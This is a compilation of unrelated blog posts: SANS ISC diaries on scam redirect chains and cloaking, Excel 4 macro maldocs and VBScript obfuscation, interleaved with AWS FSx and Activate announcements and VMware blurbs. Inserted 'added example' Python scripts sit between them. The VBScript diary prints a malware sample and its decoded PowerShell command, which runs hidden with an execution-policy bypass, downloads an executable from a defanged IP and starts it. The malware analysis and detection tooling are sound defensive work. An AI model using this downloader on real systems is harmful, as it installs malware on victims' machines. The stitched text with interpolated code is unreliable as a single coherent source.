Quick look at a couple of current online scam campaigns, (Tue, Feb 25th)

This post was originally published on this site

Since I was exposed to three different online scam campaigns in the last three weeks, without having to go out and search for them, I thought that today might be a good time to take a look at how some of the current online scams work.

All of the campaigns we’ll mention seemed to target people in the Czech Republic, although not exclusively, as one of the landing pages I found had at least 20 different regional variants set up for countries from all over the world. In cases where I was unable to find an English version of a page, I had Chrome translate it – the results are not always pretty, but should be sufficient for our purposes.

Everything started a couple of weeks ago, when I was searching for the website of a certain small-town theater on my phone. Having found it on Google, I tapped the relevant link and was surprised when my browser didn’t stop at the intended destination but was instead redirected to a site proclaiming me a “lucky visitor” of the day with a “chance to win Apple iPhone 11 Pro”.

Given all the ad blockers and script filters I usually use, I hadn’t seen any pages or pop-ups similar to this one (not counting phishing pages, of course) for a long time, so I decided to take a closer look at it. After clicking through four questions about my browser preferences, I was informed that I had a chance to win a brand new iPhone (although it wasn’t quite obvious that the offer was to enter a contest rather than to buy the phone at an incredibly low price, as you may see for yourself).

One interesting part of this page, which deserves a special mention, was the comments section at the end, as it was seemingly populated in real time by JavaScript embedded in the HTML code. That is, all the comments were loaded as part of the original page at the same time, but displayed one at a time. I imagine that having them appear one after another, with “like counts” rising while the user watches, might look quite convincing to potential victims.

After clicking the button, the browser was redirected to another domain where, once again, it seemed as if the user had the option to buy an iPhone for a small fraction of its usual price.

Next, the site asked for some personal information – a full name and an address along with an e-mail and a phone number.

What wasn’t obvious at first glance, but would be really important to anyone actually trying to order the phone, was a small paragraph hidden at the end of the page, explaining that the customer wasn’t actually buying an iPhone but was merely entering a prize draw for it. By itself, that wouldn’t be so bad, but the rest of the text mentioned that, besides confirming his participation in the contest, the user would be subscribing to an unnamed pre-paid service with a €75 monthly fee.

The last thing required of the user at that point would be to fill in his credit card details in order to confirm the payment: not the €75 subscription, which would later be charged to the user’s account, but the “price” for the iPhone (or rather for participation in the iPhone lottery) of approximately €1.5.

About a week after I found the website mentioned above, a colleague of mine asked me, laughing, whether I wanted to buy a new iPhone for €2. My first guess was that he had managed to end up on the same site I did. This, however, turned out not to be the case, as the second campaign was straightforward phishing. Nevertheless, what caught my attention was the use of the same graphical style I had seen in the previous campaign.

Apart from the stripe at the top, the landing page (and other pages, all the way to the payment form) was nearly identical to those used in the first campaign as well.

Unlike in the first campaign, however, there was no paragraph on any of the pages explaining whether the user was actually subscribing to any service, so it is hard to say what unexpected things one might be charged for if one actually tried to buy an iPhone in this way.

Although the second campaign comes much closer to a phishing style of operation than to a classic scam, re-use of the same assets in both campaigns is interesting. Use of the same phishing kits (or “scamas” as they are sometimes called) on multiple sites is not too unusual – many such kits are actually open-sourced and some may even be found on GitHub. Nevertheless, one usually doesn’t expect to see the same kit used twice within a couple of weeks for two different campaigns with different modes of operation…much less three.

On Saturday, I was looking for information about a vulnerability in a certain software product, and one of the results Google returned ended up pointing my browser to another site with the same landing page offering iPhones for €2. At first glance, it looked like another campaign simply re-using the same kit; however, after a bit of digging around, I discovered that this campaign was actually much more complex than the previous ones.

The first and second campaigns each used a couple of forced redirects to get a user to the landing page.

The third campaign had multiple starting pages on multiple domains redirecting to a couple of domains/IP addresses, which finally redirected to multiple landing pages (or, under some conditions, to Google). I only mapped out a small part of the starting and landing pages, but the following diagram should give you an idea of the inner workings of this campaign.

Since all three parts of the redirection chain were interesting, let’s take a look at each one in turn.

The initial/starting pages used cloaking (i.e. serving different content to search engine spiders than to regular users[1]), which was the reason I landed on one of these pages in the first place – Google had it indexed as containing information which wasn’t actually there. In addition to the cloak, a referrer check was implemented on the servers serving the initial pages to make things a little more complicated. The behavior and responses of the servers therefore differed quite significantly based on a couple of factors.

  • If a user manually entered the address of one of the initial pages (for example hxxp://wzhi.buxtex.de/web-shell.html), the server would return an HTTP 404 response.
  • If the same user navigated to the same page through a link from a search engine, the server would return an HTTP 302 response and redirect the browser in the way shown in the diagram above. The server would only provide the 302 response if the address of a well-known search engine (e.g. Google or Bing) was present in the Referer header of the HTTP request. With the Referer header set to any other value, the server would – once again – return a 404 response.
  • Finally, if a search engine spider such as Googlebot visited the page, it (or anyone using a User-Agent header set to “Googlebot”) would be served clickbait content cobbled together from different sites. In the case of web-shell.html, for example, one part of the content was taken from an article published on rapid7.com.

Given the behavior of the servers described above, it is almost certain that any real user would be redirected to another URL after visiting one of the initial pages. That would start a chain of multiple forced redirections between the domains and IP addresses mentioned in the diagram above (and potentially others as well).
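The three server behaviours listed above (404 on a direct visit, 302 only with a search-engine Referer, clickbait only for a Googlebot User-Agent) are exactly what an analyst can test for without following the redirect chain. The script below is an added example, not code from the diary: it fetches one URL three times with different headers and reports whether the answers diverge. The `fetch` callable is injectable, so the same probe can be run offline against `simulated_fetch`, a constructed stand-in that mirrors the behaviour described in the diary; the hostnames it uses are placeholders.

```python
"""Probe a URL for search-engine cloaking by comparing responses across header variants.
Added example (not from the ISC diary). Real requests use urllib; the simulated
responder below is constructed from the behaviour the diary describes."""
import sys
import urllib.error
import urllib.request

REDIRECT_CODES = (301, 302, 303, 307, 308)

# Header variants corresponding to the three cases described in the diary.
PROBES = {
    "direct": {},
    "from_google": {"Referer": "https://www.google.com/"},
    "as_googlebot": {"User-Agent": "Googlebot"},
}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the 302 itself stays visible to the probe."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, headers):
    """Network fetch. Returns (status, Location header or None, body bytes)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location"), resp.read()
    except urllib.error.HTTPError as err:
        # 3xx/4xx arrive here because redirects are not followed.
        return err.code, err.headers.get("Location"), err.read()


def simulated_fetch(url, headers):
    """Constructed stand-in reproducing the diary's description: 404 for a direct
    visit, 302 when the Referer is a search engine, clickbait for Googlebot."""
    ua = headers.get("User-Agent", "").lower()
    ref = headers.get("Referer", "")
    if "googlebot" in ua:
        return 200, None, b"<html>clickbait stitched together from other sites</html>"
    if any(se in ref for se in ("google.", "bing.")):
        return 302, "http://redirect-hop.example/", b""
    return 404, None, b"Not Found"


def probe_cloaking(url, fetch=http_fetch):
    """Return per-variant statuses plus a verdict on whether the page is cloaked."""
    results = {name: fetch(url, hdrs) for name, hdrs in PROBES.items()}
    statuses = {name: r[0] for name, r in results.items()}
    verdict = {
        "statuses": statuses,
        # Redirect served only when the visitor appears to arrive from a search engine.
        "redirects_from_search_only": statuses["from_google"] in REDIRECT_CODES
        and statuses["direct"] not in REDIRECT_CODES,
        # Real content served to the crawler but not to an ordinary visitor.
        "crawler_gets_content": statuses["as_googlebot"] == 200 and statuses["direct"] != 200,
        "redirect_target": results["from_google"][1],
    }
    verdict["cloaked"] = verdict["redirects_from_search_only"] or verdict["crawler_gets_content"]
    return verdict


if __name__ == "__main__":
    # Usage: python probe.py http://host/page.html   (omit the URL to run the simulation)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://placeholder.example/web-shell.html"
    fetcher = http_fetch if len(sys.argv) > 1 else simulated_fetch
    for key, value in probe_cloaking(target, fetch=fetcher).items():
        print(f"{key}: {value}")
```

Run against a suspect URL from an isolated analysis host; the `redirect_target` field gives the first hop of the chain, which is usually the most useful indicator to record.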

Although many of these appear to be suspicious at first glance, not all of them are necessarily malicious – one of the domains, ladsblue.com, actually belongs to a commercial advertising network named Adsterra. A quick Google search for Adsterra led to a number of claims that this network doesn’t always operate ethically[2], however, hoping that these claims are not correct, I did let the company know about the misuse of their ad network with the hope that they will block it.

The redirection chain would end on one of a number of different landing pages, chosen based on geolocation of the IP address from which the user was connected (and potentially other factors). It is possible that not all of the pages one might land on after the redirects end are related to scams. One of the redirection chains, for example, led to a page for a certain betting site, and even though Google results seem to indicate that it might not be a completely legitimate service, I can’t be sure of that without further research I wasn’t willing to put in.

The one site we can be quite sure was a scam, however (apart from the site using the “iPhone for €2” kit we saw in the first two campaigns), was hosted at the domain hxxps://financialwealthnow.net. The reason we may be certain of the fraudulent nature of the site is that this site was a copy of the official website of a Czech 24 hour news TV station[3].

This is the real site…

…and this is the fake one.

The text on the site tries to get visitors to register with a cryptocurrency trading platform with promises of instant wealth and with the help of a fake interview with a well-known Czech politician and entrepreneur praising the platform. If you’d like to take a closer look at the contents of the fake page, I wrote a short post about it (in Czech) at untrustednetwork.net[4].

What appears to be even more interesting than the contents of the page themselves is that the site seems to be part of a much larger operation using fake celebrity interviews and deceptive ads, which is run by a group called FizzCore (thanks to @vavkamil for pointing this out to me). The description of (for lack of a better term) TTPs of this actor provided in the analysis published by Confiant[5] fits the fake news page exactly.

Although the last campaign is quite interesting, neither it nor either of the previous ones was unique. Similarly, forced multiple redirects to less-than-reputable sites are nothing new. Even though both of these statements are true, I found the brief look I was given into the world of current internet scams fairly informative… And I hope that you did as well.

[1] https://en.wikipedia.org/wiki/Spamdexing#Cloaking
[2] https://www.google.com/search?q=adsterra+scam
[3] https://ct24.ceskatelevize.cz/
[4] https://www.untrustednetwork.net/cs/2020/02/22/ct24_podvodna_stranka/
[5] https://blog.confiant.com/fake-celebrity-endorsed-scam-abuses-ad-tech-to-net-1m-in-one-day-ffe330258e3c

Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon FSx for Lustre Update: Persistent Storage for Long-Term, High-Performance Workloads

Last year I wrote about Amazon FSx for Lustre and told you how our customers can use it to create pebibyte-scale, highly parallel POSIX-compliant file systems that serve thousands of simultaneous clients driving millions of IOPS (Input/Output Operations per Second) with sub-millisecond latency.

As a managed service, Amazon FSx for Lustre makes it easy for you to launch and run the world’s most popular high-performance file system. Our customers use this service for workloads where speed matters, including machine learning, high performance computing (HPC), and financial modeling.

Today we are enhancing Amazon FSx for Lustre by giving you the ability to create high-performance file systems that are durable and highly available, with three performance tiers, and a new, second-generation scratch file system that is designed to provide better support for spiky workloads.

Recent Updates
Before I dive in to today’s news, let’s take a look at some of the most recent updates that we have made to the service:

Data Repository APIs – This update introduced a set of APIs that allow you to easily export files from FSx to S3, including the ability to initiate, monitor, and cancel the transfer of changed files to S3. To learn more, read New Enhancements for Moving Data Between Amazon FSx for Lustre and Amazon S3.

SageMaker Integration – This update gave you the ability to use data stored on an Amazon FSx for Lustre file system as training data for an Amazon SageMaker model. You can train your models using vast amounts of data without first moving it to S3.

ParallelCluster Integration – This update let you create an Amazon FSx for Lustre file system when you use AWS ParallelCluster to create an HPC cluster, with the option to use an existing file system as well.

EKS Integration – This update let you use the new AWS FSx Container Storage Interface (CSI) driver to access Amazon FSx for Lustre file systems from your Amazon EKS clusters.

Smaller File System Sizes – This update let you create 1.2 TiB and 2.4 TiB Lustre file systems, in addition to the original 3.6 TiB.

CloudFormation Support – This update let you use AWS CloudFormation templates to deploy stacks that use Amazon FSx for Lustre file systems. To learn more, check out AWS::FSx::FileSystem LustreConfiguration.

SOC Compliance – This update announced that Amazon FSx for Lustre can now be used with applications that are subject to Service Organization Control (SOC) compliance. To learn more about this and other compliance programs, take a look at AWS Services in Scope by Compliance Program.

Amazon Linux Support – This update allowed EC2 instances running Amazon Linux or Amazon Linux 2 to access Amazon FSx for Lustre file systems.

Client Repository – You can now make use of Lustre clients that are compatible with recent versions of Ubuntu, Red Hat Enterprise Linux, and CentOS. To learn more, read Installing the Lustre Client.

New Persistent & Scratch Deployment Options
We originally launched the service to target high-speed, short-term processing of data, and as a result, until today FSx for Lustre provided scratch file systems, which are ideal for temporary storage and shorter-term processing of data — data is not replicated and does not persist if a file server fails. We’re now expanding beyond short-term processing by launching persistent file systems, designed for longer-term storage and workloads, where data is replicated and file servers are replaced if they fail.

In addition to this new deployment option, we are also launching a second-generation scratch file system that is designed to provide better support for spiky workloads, with the ability to provide burst throughput up to 6x higher than the baseline. Like the first-generation scratch file system, this one is great for temporary storage and short-term data processing.

Here is a table that will help you to choose between the deployment options:

                              | Persistent                                               | Scratch 2                                                | Scratch 1
------------------------------+----------------------------------------------------------+----------------------------------------------------------+-------------------------------------
API Name                      |                                                          |                                                          |
Storage Replication           | Same AZ                                                  | None                                                     | None
Aggregated Throughput         | 50 MB/s, 100 MB/s, 200 MB/s                              | 200 MB/s, burst to 1,200 MB/s                            | 200 MB/s
  (per TiB provisioned)       |                                                          |                                                          |
IOPS                          | Millions                                                 | Millions                                                 | Millions
Latency                       | Sub-millisecond, higher variance                         | Sub-millisecond, very low variance                       | Sub-millisecond, very low variance
Expected Workload Lifetime    | Days, Weeks, Months                                      | Hours, Days, Weeks                                       | Hours, Days, Weeks
Encryption at Rest            | Customer-managed or FSx-managed keys                     | FSx-managed keys                                         | FSx-managed keys
Encryption In Transit         | Yes, from supported EC2 instances in supported regions   | Yes, from supported EC2 instances in supported regions   | No
Initial Storage Allocation    | 1.2 TiB, 2.4 TiB, and increments of 2.4 TiB              | 1.2 TiB, 2.4 TiB, and increments of 2.4 TiB              | 1.2 TiB, 2.4 TiB, 3.6 TiB
Additional Storage Allocation | 2.4 TiB                                                  | 2.4 TiB                                                  | 3.6 TiB

Creating a Persistent File System
I can create a file system that uses the persistent deployment option using the AWS Management Console, AWS Command Line Interface (CLI) (create-file-system), a CloudFormation template, or the FSx for Lustre APIs (CreateFileSystem). I’ll use the console:

Then I mount it like any other file system, and access it as usual.
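For anyone scripting the creation step instead of using the console, the constraints in the table above (capacity steps per deployment type, throughput tiers for persistent only, customer-managed keys for persistent only) are worth checking before the call is made, because the API rejects an inconsistent request only after a round trip. The following is an added example, not AWS code: it assembles and validates the parameter set for a create_file_system call. Subnet, security-group and KMS key values are placeholders, the allowed values come from the table, and the field names (DeploymentType, PerUnitStorageThroughput, KmsKeyId, StorageCapacity in GiB) are assumed to match the FSx CreateFileSystem API.

```python
"""Build and sanity-check create_file_system parameters for FSx for Lustre.
Added example, not from the post; allowed values are taken from the table above."""
import json

DEPLOYMENT_TYPES = ("PERSISTENT_1", "SCRATCH_1", "SCRATCH_2")
# Per-TiB throughput tiers the post lists for persistent file systems (MB/s per TiB).
PERSISTENT_THROUGHPUT_TIERS = (50, 100, 200)


def _capacity_ok(deployment_type: str, capacity_gib: int) -> bool:
    """Initial allocations from the table: 1.2 TiB, 2.4 TiB, then 2.4 TiB steps for
    persistent and scratch 2; exactly 1.2, 2.4 or 3.6 TiB for scratch 1."""
    if deployment_type == "SCRATCH_1":
        return capacity_gib in (1200, 2400, 3600)
    return capacity_gib in (1200, 2400) or (capacity_gib > 2400 and capacity_gib % 2400 == 0)


def build_lustre_request(deployment_type, capacity_gib, subnet_ids, security_group_ids=(),
                         per_unit_throughput=None, kms_key_id=None):
    """Return a dict suitable for boto3's fsx.create_file_system(**request)."""
    if deployment_type not in DEPLOYMENT_TYPES:
        raise ValueError(f"unknown deployment type {deployment_type!r}")
    if not _capacity_ok(deployment_type, capacity_gib):
        raise ValueError(f"{capacity_gib} GiB is not a valid allocation for {deployment_type}")

    lustre = {"DeploymentType": deployment_type}
    if deployment_type == "PERSISTENT_1":
        if per_unit_throughput not in PERSISTENT_THROUGHPUT_TIERS:
            raise ValueError("persistent file systems need a throughput tier of 50, 100 or 200 MB/s per TiB")
        lustre["PerUnitStorageThroughput"] = per_unit_throughput
    else:
        if per_unit_throughput is not None:
            raise ValueError("throughput tiers apply to persistent file systems only")
        if kms_key_id is not None:
            # Table: scratch file systems use FSx-managed keys; a customer-managed key is a persistent-only option.
            raise ValueError("customer-managed KMS keys are only supported for persistent file systems")

    request = {
        "FileSystemType": "LUSTRE",
        "StorageCapacity": capacity_gib,
        "SubnetIds": list(subnet_ids),
        "LustreConfiguration": lustre,
    }
    if security_group_ids:
        request["SecurityGroupIds"] = list(security_group_ids)
    if kms_key_id:
        request["KmsKeyId"] = kms_key_id
    return request


if __name__ == "__main__":
    # Placeholder identifiers; replace with real ones before calling the API.
    req = build_lustre_request(
        "PERSISTENT_1", 2400, ["subnet-PLACEHOLDER"], ["sg-PLACEHOLDER"],
        per_unit_throughput=100,
        kms_key_id="arn:aws:kms:REGION:ACCOUNT:key/PLACEHOLDER",
    )
    print(json.dumps(req, indent=2))
    # With boto3 and credentials available: boto3.client("fsx").create_file_system(**req)
```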

Things to Know
Here are a couple of things to keep in mind:

Lustre Client – You will need to use an AMI (Amazon Machine Image) that includes the Lustre client. You can use the latest Amazon Linux AMI, or you can create your own.

S3 Export – Both options allow you to export changes to S3 using the CreateDataRepositoryTask function. This allows you to meet stringent Recovery Point Objectives (RPOs) while taking advantage of the fact that S3 is designed to deliver eleven 9’s of durability.

Available Now
Persistent file systems are available in all AWS regions. Scratch 2 file systems are available in all commercial AWS regions with the exception of Europe (Stockholm).

Pricing is based on the performance tier that you choose and the amount of storage that you provision; see the Amazon FSx for Lustre Pricing page for more info.


AWS has launched the Activate Founders package for Startups 🚀

Are you in a Startup?

As of today, AWS has launched the Activate Founders package for Startups! 🚀🚀🚀This package unlocks a new set of benefits. If your startup isn’t affiliated with a venture capital firm, accelerator, or incubator, then your startup can now apply to receive $1,000 in AWS Activate Credits (valid for 2 years) and $350 in AWS Developer Support Credits of AWS technical support (valid for 1 year).

👉🏽Visit aws.amazon.com/activate to learn more about the Activate Founders package and apply today.

What kind of Startups will the Activate Founders package help?

The Activate Founders package will help a lot of startups that have not yet raised institutional funding or have no plans to do so.

What kind of benefits will the Activate Founders package bring to customers?

  • Let’s start with Activate Founders credits. 💰They’re a cost-saving opportunity for experimenting, building, testing, and deploying startup architecture on AWS.
  • The AWS Developer Support Credits give startups unlimited support case access to AWS technical support through email 📧.
  • 7 Core AWS Trusted Advisor best practice checks
  • Free digital training paths for various business and technical roles, skill levels, and cloud topics.

What kind of Startups qualify for the Activate Founders package?

Startups interested in applying for the Activate Founders package benefits cannot have institutional funding, must have an AWS account, and complete the Activate Founders application form. (Startups affiliated with a venture capital firm, accelerator, or incubator, or who have previously received Activate benefits will not qualify.)

The main 6 criteria to qualify for the Activate Founders package are as follows…

  1. Complete the Activate Founders application form and provide a description of their startup.
  2. No institutional funding and not affiliated with a venture capital firm, accelerator, or incubator.
  3. Must have an AWS Account ID.
  4. Have not previously received Activate benefits.
  5. A company website or company web profile (e.g. CrunchBase, AngelList, Product Hunt, Entrepedia).
  6. Provide their LinkedIn profile.

How does a Startup apply for the Activate Founders package?

👉🏽Startups interested in applying for the Activate Founders package benefits can access the application directly from the AWS Activate console: https://console.aws.amazon.com/activate.

That said, more information about the AWS Activate program itself or details about all Activate benefits packages can be found here: https://aws.amazon.com/activate.

Will you apply?

We hope so! We look forward to helping even more customers. 🥳

NSX-T Single-Tier Routing

In this blog article I am going to cover how to configure NSX-T routing. In my previous NSX-T blog articles, up to this point, I have covered installing/configuring various components of NSX-T including the NSX-T Manager, host transport nodes, transport zones (Overlay and VLAN), edge nodes and so on. The only difference between those blogs … Continue reading NSX-T Single-Tier Routing

vRealize Automation 8 Increasing Disk Space

I was running into an issue in my Home Lab when upgrading vRealize Automation 8.0.0 to vRealize Automation 8.0.1. The upgrade was performed with vRealize Suite Lifecycle Manager or in short vRLCM and it could not complete the precheck because of issues related to the free disk space and disk space size. Here is an …

The post vRealize Automation 8 Increasing Disk Space appeared first on Be-Virtual.net.

Maldoc: Excel 4 Macros and VBA, Devil and Angel?, (Mon, Feb 24th)

Philippe Lagadec, the developer of oletools, pointed out something interesting about the following maldoc sample (MD5 a0457c2728923cb46e6d9797fe7d81dd): it contains both Excel 4 macros and VBA code.

Here is the VBA code:

It’s just displaying a message box about a problem, and when the user clicks the OK button, it attempts to close Excel. Nothing nefarious here.

And here are the Excel 4 macros:

Launching a PowerShell command. A downloader: that’s nefarious.

This sample might well be a PoC, but it’s great to illustrate that both scripting technologies (ancient Excel 4 macros and old VBA) can coexist in the same document.

When you analyze potential malicious Excel files, it’s best to check both for the presence of Excel 4 macros and VBA code.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Introduction to VMware HCX Deployments

VMware HCX is an application mobility platform that is designed for simplifying application migration, workload rebalancing, and business continuity across data centers and clouds.

VMware HCX enables:

Application migration
You can schedule and migrate thousands of vSphere virtual machines within and across data centers without requiring a reboot.

Change platforms or upgrade vSphere versions
With HCX, you can migrate workloads from vSphere 5.x and non-vSphere (KVM and Hyper-V) environments within and across data centers or clouds to current vSphere versions without requiring an upgrade.

Workload rebalancing
Workload rebalancing provides a mobility platform across cloud regions and cloud providers to allow customers to move applications and workloads at any time to meet scale, cost management, compliance, and vendor neutrality goals.

Business continuity and protection
Using HCX capabilities, administrators can protect workloads by replicating them to other HCX enabled sites. Workload migration is available on-demand, or it can be scheduled for business or maintenance planning.

Maldoc: Excel 4 Macros in OOXML Format, (Sun, Feb 23rd)

I’ve mentioned Excel 4 macros before, a scripting technology that predates VBA.

In that diary entry, I handle .xls files (ole files). Excel 4 macros can also be stored in Office Open XML format files: .xlsm files.

If we take a look at an .xlsm file with Excel 4 macros with oledump.py, we’ll get this output:

There is no OLE file (vbaProject.bin) inside an Excel 4 macro-only file.

We need to take a look with zipdump.py:

The presence of the folder macrosheets tells us that there are Excel 4 macro sheets inside this file.

We can look at the content of the XML file:

And pretty-print it with xmldump.py:

Now it’s easier to spot the formulas: EXEC(“calc.exe”) and HALT()

And the Auto_Open can be found in the worksheet XML file:

It’s possible to have both macro types inside the same file: Excel 4 and VBA macros. I’ll cover that in an upcoming diary entry.
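The two checks this diary and the previous one (Excel 4 Macros and VBA, Devil and Angel?) recommend for OOXML files, a vbaProject.bin for VBA and a macrosheets folder for Excel 4 macros, can be automated for triage. The script below is an added example, not part of the diary or of the oledump/zipdump tool set: it opens an .xlsm archive, records whether a VBA project is present, lists every macrosheet and the formulas in it that start with a function of interest (EXEC and HALT from the diary, plus a few commonly abused ones I have assumed), and pulls auto-run defined names from workbook.xml. The sample workbook is constructed in memory and is not a real file.

```python
"""Triage an .xlsm archive for Excel 4 macro sheets, VBA projects and auto-run names.
Added example; not from the ISC diary. The sample file is constructed inline."""
import html
import io
import re
import zipfile

# EXEC and HALT are the formulas shown in the diary; the rest are assumed extras.
SUSPICIOUS_FUNCS = ("EXEC", "HALT", "CALL", "REGISTER", "RUN", "FORMULA")
# Both the built-in _xlnm.Auto_Open form and a plain Auto_Open name are treated as auto-run.
AUTO_RUN_SUFFIXES = ("auto_open", "auto_close")


def triage_xlsm(data: bytes) -> dict:
    """Return VBA presence, macrosheet names, suspicious formulas and auto-run names."""
    findings = {"vba_project": False, "macrosheets": [], "formulas": [], "auto_names": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower == "xl/vbaproject.bin":
                findings["vba_project"] = True
            elif lower.startswith("xl/macrosheets/") and lower.endswith(".xml"):
                findings["macrosheets"].append(name)
                xml = zf.read(name).decode("utf-8", errors="replace")
                # Cell formulas sit in <f>...</f> elements; entities such as &quot; must be decoded.
                for raw in re.findall(r"<f[^>]*>(.*?)</f>", xml, flags=re.S):
                    text = html.unescape(raw).strip()
                    if any(re.match(rf"{fn}\s*\(", text, re.I) for fn in SUSPICIOUS_FUNCS):
                        findings["formulas"].append(text)
            elif lower == "xl/workbook.xml":
                xml = zf.read(name).decode("utf-8", errors="replace")
                for m in re.finditer(r'<definedName[^>]*\bname="([^"]+)"[^>]*>(.*?)</definedName>', xml, re.S):
                    if m.group(1).lower().endswith(AUTO_RUN_SUFFIXES):
                        findings["auto_names"].append((m.group(1), html.unescape(m.group(2))))
    return findings


def build_sample() -> bytes:
    """Constructed minimal archive mimicking an Excel 4 macro-only .xlsm (not a real file)."""
    macrosheet = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<xm:macrosheet xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
        '<sheetData><row r="1"><c r="A1"><f>EXEC(&quot;calc.exe&quot;)</f></c></row>'
        '<row r="2"><c r="A2"><f>HALT()</f></c></row></sheetData></xm:macrosheet>'
    )
    workbook = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<workbook><sheets><sheet name="Macro1" sheetId="1"/></sheets>'
        '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>'
        '</definedNames></workbook>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for key, value in triage_xlsm(data).items():
        print(f"{key}: {value}")
```

A file that reports both `vba_project` and non-empty `macrosheets` is the "devil and angel" case from the earlier diary and deserves a look at both code paths, not just the VBA.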


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Simple but Efficient VBScript Obfuscation, (Sat, Feb 22nd)

Today, it’s easy to guess whether a piece of code is malicious or not: many security solutions automatically detonate it in a sandbox. This remains a quick and (most of the time still) efficient way to get a first idea about the code’s behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be when implementing new obfuscation techniques.

This morning, I spotted a very simple VBScript of only 50 lines. It gets an excellent VT score of 1/60[1], but it was spotted by my hunting rule!

Basically, all suspicious keywords that could trigger a bell are replaced with random strings, which are swapped back during execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object System.net.webclient)" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _
  & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32\WindowsPowerShell\v1.0\powershell.exe" )
  -Executionpolicy bypass
  -windowstyle hidden
  -command "Set-Content -value (new-object System.net.webclient).downloaddata('http://54[.]233[.]198[.]219/a.exe')
                 -encoding byte -Path $env:appdata\Microsoft\NetworkConnections\xxxxx.exe;
            Start-Process $env:appdata\Microsoft\NetworkConnections\xxxxx.exe"

(The dumped payload name xxxxx.exe is a random string of 25 characters)
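Because every Replace() call in this script is a literal-to-literal substitution, the command can be recovered statically by harvesting the Replace mappings and applying them to the concatenated string, without ever executing the VBScript. The helper below is an added example, not the diary's code: it joins VBScript line continuations, evaluates `&` concatenations of string literals and variable names (unknown names such as x004, the PowerShell path built elsewhere in the script, are kept as `<name>` placeholders), and replays the Replace() statements in order. The embedded sample is constructed from a subset of the tokens shown above; the mapping for any token the diary does not decode is left out.

```python
"""Static recovery of Replace()-obfuscated VBScript strings. Added example, not
the diary's code. SAMPLE_VBS is constructed from tokens shown in the diary."""
import re

SAMPLE_VBS = r'''
x002 = """" & x004 & """-OXentrew BCijaMA " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object System.net.webclient)" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) "
x002 = Replace(x002,"OXentrew","Executionpolicy")
x002 = Replace(x002,"BCijaMA","bypass")
x002 = Replace(x002,"caralhos2","hidden")
x002 = Replace(x002,"Seisal","command")
x002 = Replace(x002,"FuiDUi","downloaddata")
x002 = Replace(x002,"MIGOSEYLOVO","http://")
'''

# var = Replace(source, "token", "value")   (VBScript doubles quotes inside literals)
REPLACE_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Replace\(\s*(\w+)\s*,\s*"((?:[^"]|"")*)"\s*,\s*"((?:[^"]|"")*)"\s*\)\s*$',
    re.I,
)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")


def _parse_concat(expr: str, env: dict) -> str:
    """Evaluate an expression made of "literals" and names joined by '&'."""
    out, i, n = [], 0, len(expr)
    while i < n:
        c = expr[i]
        if c == '"':
            j, buf = i + 1, []
            while j < n:
                if expr[j] == '"':
                    if j + 1 < n and expr[j + 1] == '"':  # "" is an escaped quote
                        buf.append('"')
                        j += 2
                        continue
                    break
                buf.append(expr[j])
                j += 1
            out.append("".join(buf))
            i = j + 1
        elif c.isalnum() or c == "_":
            j = i
            while j < n and (expr[j].isalnum() or expr[j] == "_"):
                j += 1
            name = expr[i:j]
            out.append(env.get(name, f"<{name}>"))  # unknown names become placeholders
            i = j
        else:
            i += 1  # '&' and whitespace carry no value
    return "".join(out)


def deobfuscate(src: str) -> dict:
    """Return the final value of every string variable after replaying Replace() calls."""
    env = {}
    # VBScript continues a statement on the next line when it ends with ' _'.
    joined = re.sub(r"[ \t]*_[ \t]*\r?\n[ \t]*", " ", src)
    for line in joined.splitlines():
        m = REPLACE_RE.match(line)
        if m:
            target, source, token, value = m.groups()
            token, value = token.replace('""', '"'), value.replace('""', '"')
            env[target] = env.get(source, f"<{source}>").replace(token, value)
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = _parse_concat(m.group(2), env)
    return env


if __name__ == "__main__":
    for var, value in deobfuscate(SAMPLE_VBS).items():
        print(f"{var} = {value}")
```

Only literal concatenation and Replace() are modelled; calls such as CreateObject(...) show up as placeholders, which is enough to read the command line while leaving the script unexecuted.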

